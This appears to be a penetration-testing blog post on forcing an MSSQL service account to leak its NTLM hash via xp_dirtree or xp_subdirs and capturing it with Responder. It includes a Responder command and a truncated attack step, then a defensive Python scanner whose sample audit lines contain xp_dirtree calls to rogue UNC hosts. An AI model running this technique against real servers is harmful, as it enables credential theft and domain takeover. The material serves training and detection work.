Capture NTLM Hashes with MSSQL: An Essential OSCP Tip
In the world of penetration testing, every opportunity to gain a foothold in a target environment counts. Understanding how to leverage an MSSQL session can open doors to lateral movement and privilege escalation. This guide will walk you through how to use `xp_dirtree` and `xp_subdirs` to capture NTLM hashes from an MSSQL service account — potentially leading to full control of an Active Directory (AD) domain.
Obtaining NTLM Hashes
Imagine you’ve managed to compromise a system and find yourself in an MSSQL session. Now, what’s next? MSSQL databases are often overlooked as a pivot point for lateral movement, but they can be a goldmine if you know what to look for. The `xp_dirtree` and `xp_subdirs` extended stored procedures are two key tools that can help you gather valuable information.
`xp_dirtree` and `xp_subdirs` are extended stored procedures in MSSQL that list directories on the database server. What makes them powerful from a pentesting perspective is that they also accept network paths: when pointed at a share, the MSSQL service account authenticates to that host, and that authentication is what exposes its NTLM hash. Here’s the basic idea:
1. Set up Responder and start listening so it can capture the hash:
responder -I tun0
2. Invoke the Stored Procedure: From the MSSQL session, execute the `xp_dirtree` or `xp_subdirs`…
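From the defender's side, the same behaviour is easy to spot: an `xp_dirtree` or `xp_subdirs` call whose argument is a UNC path to a host that is not a known file server. The script below is an added example (not from the original post) that scans constructed audit lines in a simplified `timestamp|login|client|statement` layout, standing in for what a SQL Server Audit or Extended Events session would record; the layout, sample values and `fileserver01` allowlist are all assumptions.

```python
import re
from dataclasses import dataclass

# Constructed sample audit lines (not real SQL Server Audit output).
SAMPLE_AUDIT_LINES = [
    r"2024-05-01T10:02:11|svc_web|10.0.0.7|SELECT name FROM sys.databases",
    r"2024-05-01T10:02:15|svc_web|10.0.0.7|EXEC master..xp_dirtree '\\10.0.0.99\share'",
    r"2024-05-01T10:03:40|dba_admin|10.0.0.2|EXEC xp_dirtree 'C:\Backups'",
    r"2024-05-01T10:03:55|dba_admin|10.0.0.2|EXEC xp_dirtree '\\fileserver01\backups'",
    r"2024-05-01T10:04:02|svc_web|10.0.0.7|exec master.dbo.xp_subdirs '\\unknown-host\x'",
]

# Hosts the SQL Server service account is expected to talk to (assumed allowlist).
KNOWN_FILE_SERVERS = {"fileserver01"}

# Procedures on this page that make the server authenticate to a remote path.
PROC_RE = re.compile(r"\bxp_(?:dirtree|subdirs)\b", re.IGNORECASE)
# A UNC prefix (\\host\...) anywhere in the statement; group 1 is the host.
UNC_RE = re.compile(r"\\\\([A-Za-z0-9._-]+)")


@dataclass
class Finding:
    timestamp: str
    login: str
    client: str
    procedure: str
    target_host: str


def scan_audit_lines(lines, allowlist=KNOWN_FILE_SERVERS):
    """Return one Finding per xp_dirtree/xp_subdirs call aimed at an unexpected UNC host."""
    findings = []
    for line in lines:
        try:
            ts, login, client, stmt = line.split("|", 3)
        except ValueError:
            continue  # malformed line, skip rather than crash the scan
        proc = PROC_RE.search(stmt)
        if not proc:
            continue
        unc = UNC_RE.search(stmt)
        if not unc:
            continue  # local path (e.g. C:\Backups): no outbound authentication
        host = unc.group(1)
        if host.lower() in {h.lower() for h in allowlist}:
            continue  # known file server: routine use, not flagged
        findings.append(Finding(ts, login, client, proc.group(0).lower(), host))
    return findings


if __name__ == "__main__":
    for f in scan_audit_lines(SAMPLE_AUDIT_LINES):
        print(f"{f.timestamp} {f.login}@{f.client} {f.procedure} -> {f.target_host}")
```

Alerting on these calls, and revoking `EXECUTE` on both procedures from logins that do not need them, closes the path this article describes.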